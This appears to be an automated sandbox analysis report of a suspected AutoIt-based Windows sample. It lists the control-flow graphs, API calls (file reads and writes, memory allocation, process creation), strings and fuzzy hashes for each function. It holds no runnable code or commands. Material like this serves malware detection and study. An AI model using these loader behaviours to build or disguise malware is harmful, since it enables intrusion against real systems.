                                              control_flow_graph 1015 1007fa0-1007ff2 call 1007ea0 CreateFileW 1018 1007ff4-1007ff6 1015->1018 1019 1007ffb-1008008 1015->1019 1020 1008154-1008158 1018->1020 1022 100800a-1008016 1019->1022 1023 100801b-1008032 VirtualAlloc 1019->1023 1022->1020 1024 1008034-1008036 1023->1024 1025 100803b-1008061 CreateFileW 1023->1025 1024->1020 1026 1008063-1008080 1025->1026 1027 1008085-100809f ReadFile 1025->1027 1026->1020 1029 10080a1-10080be 1027->1029 1030 10080c3-10080c7 1027->1030 1029->1020 1032 10080e8-10080ff WriteFile 1030->1032 1033 10080c9-10080e6 1030->1033 1034 1008101-1008128 1032->1034 1035 100812a-100814f CloseHandle VirtualFree 1032->1035 1033->1020 1034->1020 1035->1020
                                              APIs
                                              • CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 01007FE5
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2131329969.0000000001007000.00000040.00000020.00020000.00000000.sdmp, Offset: 01007000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_1007000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: CreateFile
                                              • String ID:
                                              • API String ID: 823142352-0
                                              • Opcode ID: eb584f4a57c68eb24893e8662cdde2a6850f072ba7aa360e4ef334368506de38
                                              • Instruction ID: 522e93274f81fb7c53309dd3697c0bb6c76bf4feea5e6a0ee254badb62fe417f
                                              • Opcode Fuzzy Hash: eb584f4a57c68eb24893e8662cdde2a6850f072ba7aa360e4ef334368506de38
                                              • Instruction Fuzzy Hash: 4F51F9B5A50248FBEF60DFA4CC49FDE77B8BF48700F108954F64AEA2C0DA7496448B64
                                              Function 00B539D5 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1055 b539d5-b53a45 CreateWindowExW * 2 ShowWindow * 2
                                              APIs
                                              • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00B53A03
                                              • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00B53A24
                                              • ShowWindow.USER32(00000000,?,?), ref: 00B53A38
                                              • ShowWindow.USER32(00000000,?,?), ref: 00B53A41
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: Window$CreateShow
                                              • String ID: AutoIt v3$edit
                                              • API String ID: 1584632944-3779509399
                                              • Opcode ID: 8b0d95a03384235277081aeb1b27a3e0f2e4928a18002e7cfbaa7c41fe3164ef
                                              • Instruction ID: 24ffe618c100a79ff6c8b84777bc8c3f9c69bca05c9fc2e01ecc738e02ac4767
                                              • Opcode Fuzzy Hash: 8b0d95a03384235277081aeb1b27a3e0f2e4928a18002e7cfbaa7c41fe3164ef
                                              • Instruction Fuzzy Hash: DAF03A76601690BEEA305B23AC08FBB6E7DE7C7F50B01802AB900A3270D6B10801CAB0
                                              Function 00B5407C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88windowCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1056 b5407c-b54092 1057 b5416f-b54173 1056->1057 1058 b54098-b540ad call b57a16 1056->1058 1061 b8d3c8-b8d3d7 LoadStringW 1058->1061 1062 b540b3-b540d3 call b57bcc 1058->1062 1065 b8d3e2-b8d3fa call b57b2e call b56fe3 1061->1065 1062->1065 1066 b540d9-b540dd 1062->1066 1075 b540ed-b5416a call b72de0 call b5454e call b72dbc Shell_NotifyIconW call b55904 1065->1075 1078 b8d400-b8d41e call b57cab call b56fe3 call b57cab 1065->1078 1068 b54174-b5417d call b58047 1066->1068 1069 b540e3-b540e8 call b57b2e 1066->1069 1068->1075 1069->1075 1075->1057 1078->1075
                                              APIs
                                              • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00B8D3D7
                                                • Part of subcall function 00B57BCC: _memmove.LIBCMT ref: 00B57C06
                                              • _memset.LIBCMT ref: 00B540FC
                                              • _wcscpy.LIBCMT ref: 00B54150
                                              • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00B54160
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                                              • String ID: Line:
                                              • API String ID: 3942752672-1585850449
                                              • Opcode ID: 281cd9cf18b7dc52a750a60aef78ebbdc68eabe6e3dc6a1aa3ab864676cb1b95
                                              • Instruction ID: 484226f92eddfd8a367e65c6d91033e9dfe0bc597b37224012add90c0b41b058
                                              • Opcode Fuzzy Hash: 281cd9cf18b7dc52a750a60aef78ebbdc68eabe6e3dc6a1aa3ab864676cb1b95
                                              • Instruction Fuzzy Hash: 7D31D072108705AED320EB60EC46FDB77D8EF84305F1085AAF985921E1EF70969CCB82
                                              Function 00B7541D Relevance: 7.7, APIs: 5, Instructions: 163COMMONLIBRARYCODE
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1150 b7541d-b75436 1151 b75453 1150->1151 1152 b75438-b7543d 1150->1152 1154 b75455-b7545b 1151->1154 1152->1151 1153 b7543f-b75441 1152->1153 1155 b75443-b75448 call b78b28 1153->1155 1156 b7545c-b75461 1153->1156 1167 b7544e call b78db6 1155->1167 1158 b75463-b7546d 1156->1158 1159 b7546f-b75473 1156->1159 1158->1159 1161 b75493-b754a2 1158->1161 1162 b75475-b75480 call b72de0 1159->1162 1163 b75483-b75485 1159->1163 1165 b754a4-b754a7 1161->1165 1166 b754a9 1161->1166 1162->1163 1163->1155 1164 b75487-b75491 1163->1164 1164->1155 1164->1161 1169 b754ae-b754b3 1165->1169 1166->1169 1167->1151 1172 b7559c-b7559f 1169->1172 1173 b754b9-b754c0 1169->1173 1172->1154 1174 b754c2-b754ca 1173->1174 1175 b75501-b75503 1173->1175 1174->1175 1178 b754cc 1174->1178 1176 b75505-b75507 1175->1176 1177 b7556d-b7556e call b80ba7 1175->1177 1179 b7552b-b75536 1176->1179 1180 b75509-b75511 1176->1180 1186 b75573-b75577 1177->1186 1182 b754d2-b754d4 1178->1182 1183 b755ca 1178->1183 1187 b7553a-b7553d 1179->1187 1188 b75538 1179->1188 1184 b75513-b7551f 1180->1184 1185 b75521-b75525 1180->1185 1189 b754d6-b754d8 1182->1189 1190 b754db-b754e0 1182->1190 1191 b755ce-b755d7 1183->1191 1192 b75527-b75529 1184->1192 1185->1192 1186->1191 1193 b75579-b7557e 1186->1193 1194 b755a4-b755a8 1187->1194 1195 b7553f-b7554b call b746e6 call b80e5b 1187->1195 1188->1187 1189->1190 1190->1194 1196 b754e6-b754ff call b80cc8 1190->1196 1191->1154 1192->1187 1193->1194 1197 b75580-b75591 1193->1197 1198 b755ba-b755c5 call b78b28 1194->1198 1199 b755aa-b755b7 call b72de0 1194->1199 1211 b75550-b75555 1195->1211 1210 b75562-b7556b 1196->1210 1202 b75594-b75596 1197->1202 1198->1167 1199->1198 1202->1172 1202->1173 1210->1202 1212 b755dc-b755e0 1211->1212 1213 b7555b-b7555e 1211->1213 1212->1191 1213->1183 1214 b75560 1213->1214 1214->1210
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                              • String ID:
                                              • API String ID: 1559183368-0
                                              • Opcode ID: dfdd2df0ab245b9716d30a375d324e0946404ce6e082d96a71c3349c3dbc91e5
                                              • Instruction ID: 38f9f4307beecffcefa8249c5b8ec4e16dbd60b88c8a93fbd5e50c39494d654b
                                              • Opcode Fuzzy Hash: dfdd2df0ab245b9716d30a375d324e0946404ce6e082d96a71c3349c3dbc91e5
                                              • Instruction Fuzzy Hash: 6351A370A00B059BDB349F69D88066E77E6EF50321F24C7A9F83D962D4D7B1DE909B40
                                              Function 00B5686A Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 260COMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00B54DDD: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,00C152F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00B54E0F
                                              • _free.LIBCMT ref: 00B8E263
                                              • _free.LIBCMT ref: 00B8E2AA
                                                • Part of subcall function 00B56A8C: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00B56BAD
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: _free$CurrentDirectoryLibraryLoad
                                              • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                              • API String ID: 2861923089-1757145024
                                              • Opcode ID: f099eee9783d550136962053b6d18631607dc0c79cf1198fa24dec0a01677dba
                                              • Instruction ID: e261935bf06c1e00a5082cf2a2a665a56a1b4870f0c89e8d1e87647d1f326790
                                              • Opcode Fuzzy Hash: f099eee9783d550136962053b6d18631607dc0c79cf1198fa24dec0a01677dba
                                              • Instruction Fuzzy Hash: 88916D719142199FCF14EFA4CC929EDB7F4FF09311B1044AAF826AB2A1DB70E945CB50
                                              Function 01009A60 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 144fileCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 01009950: Sleep.KERNELBASE(000001F4), ref: 01009961
                                              • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 01009B6B
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2131329969.0000000001007000.00000040.00000020.00020000.00000000.sdmp, Offset: 01007000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_1007000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: CreateFileSleep
                                              • String ID: 8VIBXL00WBQSJQJ
                                              • API String ID: 2694422964-822010546
                                              • Opcode ID: e7ff5be01e2585babea1e6856b9219b47a3c41df6653cdb419f0c3404d6d8e59
                                              • Instruction ID: 762a38620ab55ea60b6dbe7ec3de3450ed5108cb082a17facebd82ce97052e6d
                                              • Opcode Fuzzy Hash: e7ff5be01e2585babea1e6856b9219b47a3c41df6653cdb419f0c3404d6d8e59
                                              • Instruction Fuzzy Hash: 7851A231D04249DBEF12DBA4C914BEFBBB4AF08304F004198E648BB2C1D7791B49CBA5
                                              Function 00B535B0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59registryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,00B535A1,SwapMouseButtons,00000004,?), ref: 00B535D4
                                              • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,00B535A1,SwapMouseButtons,00000004,?,?,?,?,00B52754), ref: 00B535F5
                                              • RegCloseKey.KERNELBASE(00000000,?,?,00B535A1,SwapMouseButtons,00000004,?,?,?,?,00B52754), ref: 00B53617
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: CloseOpenQueryValue
                                              • String ID: Control Panel\Mouse
                                              • API String ID: 3677997916-824357125
                                              • Opcode ID: 74f63551e2a75947e93d66876ef58deea8f394429c4f82503ea6b350ddca01df
                                              • Instruction ID: b59badd1e5f55a4ff5b5f03a3ae71123aa34d1db9d58d24c919c5b9ac5bb3f4d
                                              • Opcode Fuzzy Hash: 74f63551e2a75947e93d66876ef58deea8f394429c4f82503ea6b350ddca01df
                                              • Instruction Fuzzy Hash: 17114871519209BFDB208F64DC80ABEB7F8EF04B81F0084AAF805D7310E6719E549760
                                              Function 00B7470A Relevance: 6.1, APIs: 4, Instructions: 136COMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                              • String ID:
                                              • API String ID: 2782032738-0
                                              • Opcode ID: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
                                              • Instruction ID: 2af298497ab0877867d5e0a62d4f3379a925012c12cb560e94a46984c847d75b
                                              • Opcode Fuzzy Hash: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
                                              • Instruction Fuzzy Hash: 38419375B007499BDB1C8E69C8809AE7BE5EF46362B24C5BDE83DCB640EB70DD418B41
                                              Function 00B57285 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                                              Download Yara Rule
                                              APIs
                                              • _memset.LIBCMT ref: 00B8EA39
                                              • 75D3D0D0.COMDLG32(?), ref: 00B8EA83
                                                • Part of subcall function 00B54750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00B54743,?,?,00B537AE,?), ref: 00B54770
                                                • Part of subcall function 00B70791: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00B707B0
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: NamePath$FullLong_memset
                                              • String ID: X
                                              • API String ID: 3051022977-3081909835
                                              • Opcode ID: 8041893aa20d719217cf31e2a1087b83b88535ff46e7c2fd249c2424a72d067b
                                              • Instruction ID: 5c14e49679abe86b63a17bc4072ccd4ecc3705f4abefb4c2cba13961c26246f0
                                              • Opcode Fuzzy Hash: 8041893aa20d719217cf31e2a1087b83b88535ff46e7c2fd249c2424a72d067b
                                              • Instruction Fuzzy Hash: 9121C371A102489BCF01AF94D845BEE7BFCAF49715F00809AE858A7281DFB4598DCFA1
                                              Function 00BB8D91 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: __fread_nolock_memmove
                                              • String ID: EA06
                                              • API String ID: 1988441806-3962188686
                                              • Opcode ID: 13e6d7720c811f7fece47b6ef7f6b5805a097db4a6ccf41778ef8bad5b013571
                                              • Instruction ID: e023149b6c1b871992c1d28fb42625d6b2364027c00348aa7e5faa9fefdcb30a
                                              • Opcode Fuzzy Hash: 13e6d7720c811f7fece47b6ef7f6b5805a097db4a6ccf41778ef8bad5b013571
                                              • Instruction Fuzzy Hash: C301D6718042186EDB28DAA8C856EFE7BFCDB11301F0081AFF596D2181E9B5A6088B60
                                              Function 00B70DB6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00B7571C: __FF_MSGBANNER.LIBCMT ref: 00B75733
                                                • Part of subcall function 00B7571C: __NMSG_WRITE.LIBCMT ref: 00B7573A
                                                • Part of subcall function 00B7571C: RtlAllocateHeap.NTDLL(00F80000,00000000,00000001), ref: 00B7575F
                                              • std::exception::exception.LIBCMT ref: 00B70DEC
                                              • __CxxThrowException@8.LIBCMT ref: 00B70E01
                                                • Part of subcall function 00B7859B: RaiseException.KERNEL32(?,?,00000000,00C09E78,?,00000001,?,?,?,00B70E06,00000000,00C09E78,00B59E8C,00000001), ref: 00B785F0
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                              • String ID: bad allocation
                                              • API String ID: 3902256705-2104205924
                                              • Opcode ID: 1453dd1d4c5a069baf42df710cca0666f7c8b792bc27a3f7239b68400a121fe0
                                              • Instruction ID: c652f340c99ee507b62df535f5670b661ceab5b8fcd1b4cef33456908a211cc2
                                              • Opcode Fuzzy Hash: 1453dd1d4c5a069baf42df710cca0666f7c8b792bc27a3f7239b68400a121fe0
                                              • Instruction Fuzzy Hash: 15F06D3294031DA6DB20BBA5EC469DEB7ECDB05311F1084A6BD2C96281DBB09A9092D1
                                              Function 01008680 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41processCOMMON
                                              Download Yara Rule
                                              APIs
                                              • CreateProcessW.KERNELBASE(?,00000000), ref: 010086C5
                                              • ExitProcess.KERNEL32(00000000), ref: 010086E4
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2131329969.0000000001007000.00000040.00000020.00020000.00000000.sdmp, Offset: 01007000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_1007000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: Process$CreateExit
                                              • String ID: D
                                              • API String ID: 126409537-2746444292
                                              • Opcode ID: 03e416529f94357cb7ee45147abf4bf6199a2e9bce9b56f1b6d0fc2bb1e3bcca
                                              • Instruction ID: 0a9ec670b5506a5111371725d51f3d34d8b931d5bac2a2345b94818e14243d4c
                                              • Opcode Fuzzy Hash: 03e416529f94357cb7ee45147abf4bf6199a2e9bce9b56f1b6d0fc2bb1e3bcca
                                              • Instruction Fuzzy Hash: 83F0EC7594024CABEB61DFE0CC49FEE77BCBF08705F008509BB5A9A180DA7496488B61
                                              Function 00BB98E3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16COMMON
                                              Download Yara Rule
                                              APIs
                                              • GetTempPathW.KERNEL32(00000104,?), ref: 00BB98F8
                                              • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00BB990F
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: Temp$FileNamePath
                                              • String ID: aut
                                              • API String ID: 3285503233-3010740371
                                              • Opcode ID: 24eb931da8f0e4fea4176a7bedb41f2939908d1011a8c1743ec626e3856a31bf
                                              • Instruction ID: 09c7898c6e479bdfb8a3b66ebc70c788bf7d60bbd3339f26271c1732c5632863
                                              • Opcode Fuzzy Hash: 24eb931da8f0e4fea4176a7bedb41f2939908d1011a8c1743ec626e3856a31bf
                                              • Instruction Fuzzy Hash: 28D05B7554530E6BDB509B90DC0DFA6B73CD704700F0042B1BA55921D1ED7095588B95
                                              Function 00BCCADD Relevance: 4.9, APIs: 3, Instructions: 392COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmpDownload File
